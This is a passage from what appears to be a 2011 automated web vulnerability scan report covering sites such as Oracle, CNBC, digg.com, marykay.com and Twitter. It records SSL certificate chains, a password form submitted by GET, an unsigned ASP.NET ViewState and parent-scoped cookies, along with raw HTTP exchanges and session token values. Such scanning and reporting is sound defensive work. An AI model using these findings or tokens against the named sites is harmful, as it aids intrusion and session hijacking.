Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9.11. https://event.on24.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://event.on24.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.on24.com Issued by: Network Solutions Certificate Authority Valid from: Tue Oct 07 18:00:00 GMT-06:00 2008 Valid to: Thu Oct 18 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: Network Solutions Certificate Authority Issued by: UTN-USERFirst-Hardware Valid from: Sun Apr 09 18:00:00 GMT-06:00 2006 Valid to: Sat May 30 04:48:38 GMT-06:00 2020
Certificate chain #2 Issued to: UTN-USERFirst-Hardware Issued by: UTN-USERFirst-Hardware Valid from: Fri Jul 09 12:10:42 GMT-06:00 1999 Valid to: Tue Jul 09 12:19:22 GMT-06:00 2019
9.12. https://forms.netsuite.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://forms.netsuite.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.netsuite.com Issued by: Go Daddy Secure Certification Authority Valid from: Thu Jan 07 17:22:23 GMT-06:00 2010 Valid to: Mon Jan 07 17:22:23 GMT-06:00 2013
Certificate chain #1 Issued to: Go Daddy Secure Certification Authority Issued by: Go Daddy Class 2 Certification Authority Valid from: Wed Nov 15 19:54:37 GMT-06:00 2006 Valid to: Sun Nov 15 19:54:37 GMT-06:00 2026
Certificate chain #2 Issued to: Go Daddy Class 2 Certification Authority Issued by: Go Daddy Class 2 Certification Authority Valid from: Tue Jun 29 11:06:20 GMT-06:00 2004 Valid to: Thu Jun 29 11:06:20 GMT-06:00 2034
9.13. https://forums.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://forums.oracle.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.oracle.com,ST=CALIFORNIA Issued by: Akamai Subordinate CA 3 Valid from: Fri Apr 22 13:47:51 GMT-06:00 2011 Valid to: Sun Apr 22 13:47:51 GMT-06:00 2012
Certificate chain #1 Issued to: Akamai Subordinate CA 3 Issued by: GTE CyberTrust Global Root Valid from: Thu May 11 09:32:00 GMT-06:00 2006 Valid to: Sat May 11 17:59:00 GMT-06:00 2013
Certificate chain #2 Issued to: GTE CyberTrust Global Root Issued by: GTE CyberTrust Global Root Valid from: Wed Aug 12 18:29:00 GMT-06:00 1998 Valid to: Mon Aug 13 17:59:00 GMT-06:00 2018
9.14. https://login.cnbc.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: login.cnbc.com Issued by: Trusted Secure Certificate Authority Valid from: Sun Sep 27 18:00:00 GMT-06:00 2009 Valid to: Wed Sep 28 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: Trusted Secure Certificate Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Thu Jun 28 12:14:35 GMT-06:00 2007 Valid to: Sun Oct 28 12:44:35 GMT-06:00 2012
Certificate chain #2 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
Certificate chain #3 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
9.15. https://login.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: login.oracle.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Mon Mar 21 18:00:00 GMT-06:00 2011 Valid to: Wed Jun 20 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9.16. https://myprofile.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://myprofile.oracle.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.oracle.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Wed Mar 30 18:00:00 GMT-06:00 2011 Valid to: Tue Jul 31 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9.17. https://oracleus.wingateweb.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://oracleus.wingateweb.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.wingateweb.com Issued by: Entrust Certification Authority - L1C Valid from: Fri Apr 16 13:57:30 GMT-06:00 2010 Valid to: Tue Apr 16 14:27:27 GMT-06:00 2013
Certificate chain #1 Issued to: Entrust Certification Authority - L1C Issued by: Entrust.net Certification Authority (2048) Valid from: Thu Dec 10 14:43:54 GMT-06:00 2009 Valid to: Tue Dec 10 15:13:54 GMT-06:00 2019
Certificate chain #2 Issued to: Entrust.net Certification Authority (2048) Issued by: Entrust.net Certification Authority (2048) Valid from: Fri Dec 24 11:50:51 GMT-06:00 1999 Valid to: Tue Jul 24 08:15:12 GMT-06:00 2029
9.18. https://register.cnbc.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: register.cnbc.com Issued by: Trusted Secure Certificate Authority Valid from: Sun Sep 27 18:00:00 GMT-06:00 2009 Valid to: Wed Sep 28 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: Trusted Secure Certificate Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Thu Jun 28 12:14:35 GMT-06:00 2007 Valid to: Sun Oct 28 12:44:35 GMT-06:00 2012
Certificate chain #2 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
Certificate chain #3 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
9.19. https://shop.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://shop.oracle.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.oracle.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Wed Mar 30 18:00:00 GMT-06:00 2011 Valid to: Tue Jul 31 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9.20. https://support.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.oracle.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.oracle.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Wed Mar 30 18:00:00 GMT-06:00 2011 Valid to: Tue Jul 31 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9.21. https://www.atg.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.atg.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.atg.com,ST=MASSACHUSETTS Issued by: Akamai Subordinate CA 3 Valid from: Tue Jul 19 07:43:47 GMT-06:00 2011 Valid to: Thu Jul 19 07:43:47 GMT-06:00 2012
Certificate chain #1 Issued to: Akamai Subordinate CA 3 Issued by: GTE CyberTrust Global Root Valid from: Thu May 11 09:32:00 GMT-06:00 2006 Valid to: Sat May 11 17:59:00 GMT-06:00 2013
Certificate chain #2 Issued to: GTE CyberTrust Global Root Issued by: GTE CyberTrust Global Root Valid from: Wed Aug 12 18:29:00 GMT-06:00 1998 Valid to: Mon Aug 13 17:59:00 GMT-06:00 2018
9.22. https://www.cvs.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.cvs.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: www.cvs.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Wed Oct 13 18:00:00 GMT-06:00 2010 Valid to: Fri Oct 28 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
10. Password field submitted using GET method
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST" . It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:31 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=23877 10.2.130.26 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8467 <!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8"> <title>Digg - Submit a link </title> <meta name="keywords" content="Digg, pic...[SNIP]... </script><form class="hidden"> <input type="text" name="ident" value="" id="ident-saved"> <input type="password" name="password" value="" id="password-saved"> </form>...[SNIP]...
11. ASP.NET ViewState without MAC enabled
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/default.aspx
Issue description
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved. By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure. You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
Request
GET /default.aspx?pid=mk HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:45:46 GMT Content-Type: text/html; charset=utf-8 Content-Language: en Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Set-Cookie: Subsidiary=US; path=/ Set-Cookie: PreviousMoniker=; path=/ Set-Cookie: Moniker=; path=/ Set-Cookie: ConsultantContactID=-9223372036854775808; path=/ Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Vary: Accept-Encoding Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ Content-Length: 36830 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" > <html> <head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzMzMDY3ODE4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUXaWJDbG9zZUJyb3dzZXJEZXRlY3Rpb24= " />...[SNIP]...
12. Cookie scoped to parent domain
previous
next
There are 109 instances of this issue:
http://api.twitter.com/1/statuses/user_timeline.json
http://convctr.overture.com/images/cc/cc.gif
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pixel.everesttech.net/1688/i
http://ttwbs.channelintelligence.com/
http://a.tribalfusion.com/displayAd.js
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
http://a.tribalfusion.com/z/i.cid
http://ads.pointroll.com/PortalServe/
http://api.bizographics.com/v1/profile.redirect
http://b.scorecardresearch.com/b
http://c.statcounter.com/t.php
http://clk.fetchback.com/serve/fb/click
http://clk.fetchback.com/serve/fb/engmnt
https://cms.paypal.com/us/cgi-bin/
http://developers.facebook.com/plugins/
http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
https://login.cnbc.com/cas/logout
http://m1215.ic-live.com/522/
http://m1460.ic-live.com/586/
http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.js
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
http://p.brilig.com/contact/bct
http://pi.pardot.com/analytics
http://ping.crowdscience.com/ping.js
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
http://r.openx.net/img
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://rt.legolas-media.com/lgrt
http://search.spotxchange.com/track/tag/6382.1008/img
http://server.iad.liveperson.net/hc/52793056/
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://tags.bluekai.com/site/3834
http://www.actonsoftware.com/acton/bn/1227/visitor.gif
http://www.bizographics.com/collect/
http://www.marykay.com/
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
http://www.marykay.com/Content/HPflash/502_moc.swf
http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
http://www.marykay.com/IMAGES/bkgLong.gif
http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
http://www.marykay.com/Images/Site/FooterBack1.gif
http://www.marykay.com/Images/Site/hdottedline.gif
http://www.marykay.com/Images/Site/searchbox.gif
http://www.marykay.com/Images/Site/vdottedline.gif
http://www.marykay.com/Images/Site/wholeheader.jpg
http://www.marykay.com/JS/swfobject.js
http://www.marykay.com/Menu.css
http://www.marykay.com/Scripts/HeaderScript.js
http://www.marykay.com/Scripts/jquery-1.4.2.min.js
http://www.marykay.com/Styles.css
http://www.marykay.com/Styles_US.css
http://www.marykay.com/Themes/TabMenu/US/tabs.css
http://www.marykay.com/Themes/TabMenu/tabs.js
http://www.marykay.com/content/HPflash/portfolio_mk.xml
http://www.marykay.com/content/hpflash/stage.swf
http://www.marykay.com/default.aspx
http://www.marykay.com/favicon.ico
http://www.marykay.com/images/fflogo.jpg
http://www.marykay.com/images/icn_ec.jpg
http://www.marykay.com/images/icn_fb.jpg
http://www.marykay.com/images/icn_pbp.jpg
http://www.marykay.com/images/icn_vmo.jpg
http://www.marykay.com/images/icn_yt.jpg
http://www.marykay.com/images/ielogo.jpg
http://www.marykay.com/images/searchbutton.gif
http://www.marykay.com/scripts/i2a.js
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
12.1. http://api.twitter.com/1/statuses/user_timeline.json
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://api.twitter.com
Path:
/1/statuses/user_timeline.json
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yAToHaWQiJTUyNTA5ZjQ3YzU2NjU3%250ANDczMjkwZTE4ZjM0ODEyNmJjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--356f1bbdd959d20fe46289e9da9efb4258cc6a16; domain=.twitter.com; path=/; HttpOnly guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/statuses/user_timeline.json HTTP/1.1 Host: api.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 401 Unauthorized Date: Tue, 06 Sep 2011 17:05:58 GMT Server: hi Status: 401 Unauthorized WWW-Authenticate: OAuth realm="http://api.twitter.com" X-Transaction: 1315328758-6109-39893 X-RateLimit-Limit: 150 X-Frame-Options: SAMEORIGIN Last-Modified: Tue, 06 Sep 2011 17:05:58 GMT X-RateLimit-Remaining: 148 X-Runtime: 0.00626 Content-Type: application/json; charset=utf-8 Content-Length: 94 Pragma: no-cache X-RateLimit-Class: api X-Content-Type-Options: nosniff X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-MID: 7b997ce2b49ff6792faaf34e1fe6d8827fe21243 X-RateLimit-Reset: 1315332358 Set-Cookie: guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMTSet-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yAToHaWQiJTUyNTA5ZjQ3YzU2NjU3%250ANDczMjkwZTE4ZjM0ODEyNmJjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--356f1bbdd959d20fe46289e9da9efb4258cc6a16; domain=.twitter.com; path=/; HttpOnly Vary: Accept-Encoding Connection: close {"error":"This method requires authentication.","request":"\/1\/statuses\/user_timeline.json"}
12.2. http://convctr.overture.com/images/cc/cc.gif
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://convctr.overture.com
Path:
/images/cc/cc.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
